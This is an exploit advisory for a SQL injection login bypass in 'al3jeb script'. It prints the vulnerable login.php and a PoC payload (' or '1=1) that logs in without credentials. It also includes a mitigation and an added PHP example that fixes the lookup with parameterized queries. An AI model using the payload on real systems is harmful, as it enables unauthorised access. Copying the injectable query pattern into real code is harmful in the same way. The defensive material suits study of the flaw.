Vendor: al3jeb script
By: cr4wl3r
CVSS: 5.5 (MEDIUM)
Remote Login Bypass
CWE: 287
Product Name: al3jeb script
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: No
Related CWE:
CPE: Not specified
Metasploit:
Other Scripts:
Platforms Tested: Not specified
2010

al3jeb script Remote Login Bypass Exploit

This exploit bypasses the login of the al3jeb script remotely and works only when magic_quotes_gpc is turned off. The vulnerability is in login.php, which places the uname and pwd POST values into a SQL query without sanitizing them, allowing an attacker to log in without a valid username and password combination.

Mitigation:

To mitigate this vulnerability, enable magic_quotes_gpc or use proper input validation and parameterized queries to prevent SQL injection.

Exploit-DB raw data:

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |      al3jeb script Remote Login Bypass Exploit     |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------

[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Date: 19.01.2010
[!] Remote: yes

[!] Vulnerability Code [login.php] :

<?
session_start();
extract($_POST); 
extract($_GET); 
extract($_SESSION); 
extract($_COOKIE);
?>
<?php
include("Connections/config.php");
if(isset($_POST['Submit']))
{
 $u=$_POST["uname"];
 $p=$_POST["pwd"];
 $r=mysql_query("select * from admins where AdminName='$u' and AdminPass='$p'");
 
if($row=mysql_fetch_array($r))
{
 $_SESSION['AdminName']=$u;
 if(isset($re))
 {
 setcookie("username",$u,time()+3600);
 }
 header("location:index.php");
 
}
}
?>


[!] PoC: [al3jebscript]/login.php

    username : ' or '1=1
    password : cr4wl3r
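
The parameterized-query mitigation applied to the login.php lookup, as an added example that is not part of the original advisory or the al3jeb script. It assumes PDO with an in-memory SQLite table in place of the MySQL admins table and password_hash() storage instead of plaintext; check_login and concatenated_sql are hypothetical helpers and the sample rows are constructed.

```php
<?php
// Added example, not the al3jeb script's code.
// Assumptions: PDO + pdo_sqlite stand in for the MySQL connection from
// Connections/config.php; AdminPass holds password_hash() output.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE admins (AdminName TEXT PRIMARY KEY, AdminPass TEXT)");

// Constructed sample rows; the second name contains an apostrophe on purpose.
$ins = $db->prepare("INSERT INTO admins (AdminName, AdminPass) VALUES (?, ?)");
foreach ([['admin', 'sample-pw-1'], ["o'brien", 'sample-pw-2']] as [$name, $pw]) {
    $ins->execute([$name, password_hash($pw, PASSWORD_DEFAULT)]);
}

// Hypothetical helper: the lookup from login.php with the name bound as data.
function check_login(PDO $db, string $u, string $p): bool
{
    $st = $db->prepare("SELECT AdminPass FROM admins WHERE AdminName = ?");
    $st->execute([$u]);
    $hash = $st->fetchColumn();
    // fetchColumn() returns false when no row matches the literal name.
    return is_string($hash) && password_verify($p, $hash);
}

// The original string-built query, kept only to show what a quote does to it.
function concatenated_sql(string $u, string $p): string
{
    return "select * from admins where AdminName='$u' and AdminPass='$p'";
}

$cases = [
    ['admin', 'sample-pw-1'],      // valid credentials
    ['admin', 'wrong'],            // wrong password
    ["o'brien", 'sample-pw-2'],    // legitimate name containing a quote
    ["' or '1=1", 'cr4wl3r'],      // the input from the PoC on this page
];
foreach ($cases as [$u, $p]) {
    printf("%-10s => %s\n", $u, check_login($db, $u, $p) ? 'accepted' : 'rejected');
}

// With concatenation the same quote ends the string literal early, so the
// database parses the rest of the name as SQL and fails on it.
try {
    $db->query(concatenated_sql("o'brien", 'sample-pw-2'));
} catch (PDOException $e) {
    echo "concatenated query: ", $e->getMessage(), "\n";
}
```

magic_quotes_gpc was deprecated in PHP 5.3.0 and removed in PHP 5.4.0, and the mysql_* functions were removed in PHP 7.0, so bound parameters are the mitigation that applies on current PHP.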